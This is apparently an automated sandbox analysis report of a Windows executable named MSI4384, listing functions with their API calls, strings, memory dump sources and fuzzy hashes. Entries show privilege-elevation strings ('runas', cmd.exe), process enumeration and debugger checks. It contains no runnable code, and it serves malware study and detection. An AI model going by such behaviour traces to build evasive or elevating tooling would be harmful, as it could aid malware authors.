                                                                    control_flow_graph 227 45ed50-45ed5b 228 45ed5d-45ed67 227->228 229 45ed69-45ed75 227->229 228->229 230 45eda0-45edab call 44e5d2 228->230 231 45ed8b-45ed9c RtlAllocateHeap 229->231 235 45edad-45edaf 230->235 232 45ed77-45ed7e call 45cb10 231->232 233 45ed9e 231->233 232->230 239 45ed80-45ed89 call 462890 232->239 233->235 239->230 239->231
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045D0E3,00000001,00000364,00000000,?,000000FF,?,0044E0E9,?,?,?), ref: 0045ED94
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 54c49bf63418e3823805cb9bd513ed7b6f922891c72133560a6e033c66e2eaaf
                                                                    • Instruction ID: 483a6cdbb38db6f96cdd368edd41ad02610f4c88f39c11306af79a0e5eb2659a
                                                                    • Opcode Fuzzy Hash: 54c49bf63418e3823805cb9bd513ed7b6f922891c72133560a6e033c66e2eaaf
                                                                    • Instruction Fuzzy Hash: 99F05032500637ABDB641F63DC01B5B37689F813A2B054537EC04E7142EA38EE0D81ED
                                                                    Function 0045F530 Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 242 45f530-45f552 VirtualProtect
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000002,?), ref: 0045F546
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 94ab004e4a4a5d84fe3484708a091fd62ba3a0bb68609dc496f11657a0e38c1d
                                                                    • Instruction ID: a9837318647010b234e6cfbf53247f315022a07b4698afbf7943521713271993
                                                                    • Opcode Fuzzy Hash: 94ab004e4a4a5d84fe3484708a091fd62ba3a0bb68609dc496f11657a0e38c1d
                                                                    • Instruction Fuzzy Hash: 80C08031340304B7E75057529C07F4B355C9741F54F114125F541D50C0D9D0DD044219

                                                                    Non-executed Functions

                                                                    Function 00427800 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 417libraryloadersleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?,?), ref: 004279D8
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 00427A5D
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00427A7A
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00427AB8
                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00427B01
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00427B08
                                                                    • AllowSetForegroundWindow.USER32(00000000), ref: 00427B1E
                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?), ref: 00427B42
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00427B49
                                                                    • Sleep.KERNEL32(00000064,?,?,?,?), ref: 00427B6E
                                                                    • EnumWindows.USER32(00427CA0,?), ref: 00427B8A
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00004003,?,?,?,?), ref: 00427BA8
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?), ref: 00427BC5
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00427BD2
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00427CAC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00427CC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                    • API String ID: 3646750338-986041216
                                                                    • Opcode ID: a6ac269b3b2dd6948b8a167c33e216c89a50a4e3569d8fadb94d57b6f9dd2f31
                                                                    • Instruction ID: 643efe58815a59271b0711d59abce77a1da039acb3874852ca75b2d64e891499
                                                                    • Opcode Fuzzy Hash: a6ac269b3b2dd6948b8a167c33e216c89a50a4e3569d8fadb94d57b6f9dd2f31
                                                                    • Instruction Fuzzy Hash: B3F10171B042199FDB00DFA8E888AAEBBB5FF08314F50816AE505E7391EB799D04CF54
                                                                    Function 0042D400 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 483COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 0042D5C2
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?), ref: 0042D61D
                                                                    • _swprintf.LIBCMT ref: 0042D822
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?), ref: 0042D87D
                                                                    • _swprintf.LIBCMT ref: 0042D958
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf$FreeLocal
                                                                    • String ID: %$+
                                                                    • API String ID: 2429749586-2626897407
                                                                    • Opcode ID: a685fb05ae6baa4eda01d3070f25e9d6119b0b911c7ad483c78000b7443edb75
                                                                    • Instruction ID: 75b52c60dbb64978f4a5c98708b8320266709af328fc880fd5a46173ab09b4fc
                                                                    • Opcode Fuzzy Hash: a685fb05ae6baa4eda01d3070f25e9d6119b0b911c7ad483c78000b7443edb75
                                                                    • Instruction Fuzzy Hash: A902E271E002299FDB15DF64EC40BAEBBB5FF49304F54422AF811AB281D738A945CB99
                                                                    Function 004262B0 Relevance: 10.7, APIs: 7, Instructions: 232processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,F3E52339), ref: 00426322
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00426363
                                                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 004263A5
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004263C0
                                                                    • CloseHandle.KERNEL32(?), ref: 00426517
                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 00426534
                                                                    • CloseHandle.KERNEL32(?), ref: 00426565
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 708755948-0
                                                                    • Opcode ID: 53ed0edd47b22b7607b9d15e913f5be08c64fbe9acf433226895bd380889161b
                                                                    • Instruction ID: a93d629b37fbf6ee0916ff78fb9207f637cd22e74d0931b68157767a2a09010c
                                                                    • Opcode Fuzzy Hash: 53ed0edd47b22b7607b9d15e913f5be08c64fbe9acf433226895bd380889161b
                                                                    • Instruction Fuzzy Hash: B2A15070905268DFDB20DF54DC487DEBBB4EB04304F5082EAE419A7291DBB95E88CF55
                                                                    Function 004650B7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserDefaultLCID.KERNEL32 ref: 004651BF
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 004651FD
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00465210
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00465258
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00465273
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                    • String ID: lVG
                                                                    • API String ID: 3475089800-3134571959
                                                                    • Opcode ID: e17e74971ee1ac8227b625eab832a92b0504989839c98cf93ef4ed206313a279
                                                                    • Instruction ID: 3a680df6d1089171ceed010cd94970d27c5966ab6f208a82f20ae196e8e54043
                                                                    • Opcode Fuzzy Hash: e17e74971ee1ac8227b625eab832a92b0504989839c98cf93ef4ed206313a279
                                                                    • Instruction Fuzzy Hash: DE518F71E00A05ABEB20DFA5DC41BFF73B8AF49700F14056AE914E7291F77899448B6A
                                                                    Function 00465A59 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1424COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __libm_sse2_log10_precise.LIBCMT ref: 00465C85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __libm_sse2_log10_precise
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 3323863637-2761157908
                                                                    • Opcode ID: df17dd2455440a8f29a4a0aa9688c975f1936dc34238f4693b2bdb57db183ef5
                                                                    • Instruction ID: 404c254e73ce174c1c414b880503608dbe653fb05c1828ae83a584a95092c261
                                                                    • Opcode Fuzzy Hash: df17dd2455440a8f29a4a0aa9688c975f1936dc34238f4693b2bdb57db183ef5
                                                                    • Instruction Fuzzy Hash: F1C25C72E046288FDB65CE28DD407EAB7B5EB44304F1541EBD84DE7240EB79AE818F46
                                                                    Function 00464ED5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00464F6E
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00464F97
                                                                    • GetACP.KERNEL32 ref: 00464FAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 4aba080806bc9f67af97cb4ef2bf6a227b61f081e2b25e51dc65b96d1478daab
                                                                    • Instruction ID: 7d305b9afcf64f5086b839ee9d8e800d5f61ec013753acf27dcef6bd2907fe35
                                                                    • Opcode Fuzzy Hash: 4aba080806bc9f67af97cb4ef2bf6a227b61f081e2b25e51dc65b96d1478daab
                                                                    • Instruction Fuzzy Hash: 06219D32600101EAEF3C8B54D904A97B2A6ABD5B61B568026E90ADB204F73ADD81C35A
                                                                    Function 00461914 Relevance: 6.1, APIs: 4, Instructions: 128fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 004619AD
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00461A28
                                                                    • FindClose.KERNEL32(00000000), ref: 00461A4A
                                                                    • FindClose.KERNEL32(00000000), ref: 00461A6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1164774033-0
                                                                    • Opcode ID: 9af2db644459e549966510ea67153d2ac619022e3fa4656d69bebe6354e52198
                                                                    • Instruction ID: 6e3df7c2f05a51e9fff6723c2dc7483d6475f98b0b03163d2da52e621b30c101
                                                                    • Opcode Fuzzy Hash: 9af2db644459e549966510ea67153d2ac619022e3fa4656d69bebe6354e52198
                                                                    • Instruction Fuzzy Hash: C7410971A00119AFDF20DFA4DD98AABB779EB45348F084197E40593250F6749E84CB5A
                                                                    Function 0044A1F1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0044A1FD
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0044A2C9
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0044A2E2
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0044A2EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 1c045af38ad3aee086299a2fa4d154511dad2c175f899f80942aa4f25bca0a7b
                                                                    • Instruction ID: efed4c09eca0b3b91fe097b5807bdac30e4b97d791a2c1785279c83232ff4b1b
                                                                    • Opcode Fuzzy Hash: 1c045af38ad3aee086299a2fa4d154511dad2c175f899f80942aa4f25bca0a7b
                                                                    • Instruction Fuzzy Hash: D131F975D452189BEB21DFA5D9497CDBBB8BF08304F1041EAE80CAB250EB759A848F49
                                                                    Function 004326C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,004232C0,?), ref: 004326D5
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,F3E52339,00000000,00000000,00000000,00000000,?,?,?,004232C0,?), ref: 004326FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FormatInfoLocaleMessage
                                                                    • String ID: !x-sys-default-locale
                                                                    • API String ID: 4235545615-2729719199
                                                                    • Opcode ID: 16b7495743a0fd689508dbafbea1c74cb266e1ebc5ab918123d8eff7c9ee2c16
                                                                    • Instruction ID: d84c3da1e77a5ac6542feeaa1a97256f01c0565695857cde86fe68ee49af6e56
                                                                    • Opcode Fuzzy Hash: 16b7495743a0fd689508dbafbea1c74cb266e1ebc5ab918123d8eff7c9ee2c16
                                                                    • Instruction Fuzzy Hash: 0CF03075111214FFEB049B95DD0BDEF77ACEF09394F10402AF902D6150E6F0AE0097A5
                                                                    Function 00455B10 Relevance: 5.0, APIs: 3, Instructions: 470COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f92108d1559b770655b7c5004e781b0bb4a3dd80ac85cb6c7a0d19db5291400
                                                                    • Instruction ID: 7e7942ecf4f8cb3b1b6521cc5610249ff2a7a6ad10d8bb7bc79f067f31814279
                                                                    • Opcode Fuzzy Hash: 5f92108d1559b770655b7c5004e781b0bb4a3dd80ac85cb6c7a0d19db5291400
                                                                    • Instruction Fuzzy Hash: 44027F71E006199FDF14CFA8C8906AEFBB1FF48325F24826AE815BB341D734A945CB94
                                                                    Function 00464B50 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001002,?,00000078), ref: 00464BA7
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464BEB
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464CB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 7b2828b41fc7aeeec7954b91d1ea8a899ce3d23dd142dfbcb72e4814b0b8d2a5
                                                                    • Instruction ID: cebb846a70c63b7df0ba627552077f3a05ac43a7ed690ddb6409e5aba80a604d
                                                                    • Opcode Fuzzy Hash: 7b2828b41fc7aeeec7954b91d1ea8a899ce3d23dd142dfbcb72e4814b0b8d2a5
                                                                    • Instruction Fuzzy Hash: D061AE70A012169FEF289F24CD81BBA77A9EF84315F10807BE905C6285F778DD81DB5A
                                                                    Function 0044E23B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0044E333
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0044E33D
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0044E34A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 8b0d1689929e520015e283f6123428eabf80f5b3a73254ea0d722fedd74d2aea
                                                                    • Instruction ID: 5b0c122b0f02feac8e266c14a31bfaf11c8e463caa36f7abc5260baddcec6347
                                                                    • Opcode Fuzzy Hash: 8b0d1689929e520015e283f6123428eabf80f5b3a73254ea0d722fedd74d2aea
                                                                    • Instruction Fuzzy Hash: BA31E37594122CDBDB21DF29D88878DBBB8BF08314F5041EAE81CA7250EB749F858F49
                                                                    Function 004571A9 Relevance: 4.6, Strings: 3, Instructions: 822COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2G$(2G$t>G
                                                                    • API String ID: 0-3425963251
                                                                    • Opcode ID: 083a8eb5bdaf04a132274a972810067f0cca79f565c0583854651810758798b3
                                                                    • Instruction ID: 8966a015baf786a945352fe47c47493ece7386ebb684065423cb09cbdd783623
                                                                    • Opcode Fuzzy Hash: 083a8eb5bdaf04a132274a972810067f0cca79f565c0583854651810758798b3
                                                                    • Instruction Fuzzy Hash: 8642E57250810ABBDF158F55EC45EAF3F26EF49346F14402AFE0456263C23ACC65EBA9
                                                                    Function 00421D80 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadResource.KERNEL32(00000000,00000000,F3E52339,00000001,00000000,?,00000000,0046B0C0,000000FF,?,00421D2C,?,?,?,00000000,?), ref: 00421DAB
                                                                    • LockResource.KERNEL32(00000000,?,00421D2C,?,?,?,00000000,?,-00000010,0046B0A0,000000FF,?,00422048,?,00000000,0046B0ED), ref: 00421DB6
                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00421D2C,?,?,?,00000000,?,-00000010,0046B0A0,000000FF,?,00422048,?,00000000), ref: 00421DC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$LoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 2853612939-0
                                                                    • Opcode ID: 539d91a48059ac28a09bed6ca725a5e6ac575cad291547848fd76ca1b8211b43
                                                                    • Instruction ID: 7794421545aa055e677ce0ce9d710fbebdfe980d3bbe1922858fc5f49244e197
                                                                    • Opcode Fuzzy Hash: 539d91a48059ac28a09bed6ca725a5e6ac575cad291547848fd76ca1b8211b43
                                                                    • Instruction Fuzzy Hash: FB110432A006249BC7208F19EC45B67B7E8EB96715F41493BEC56D3710F639AC0086D4
                                                                    Function 004225A0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 64memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
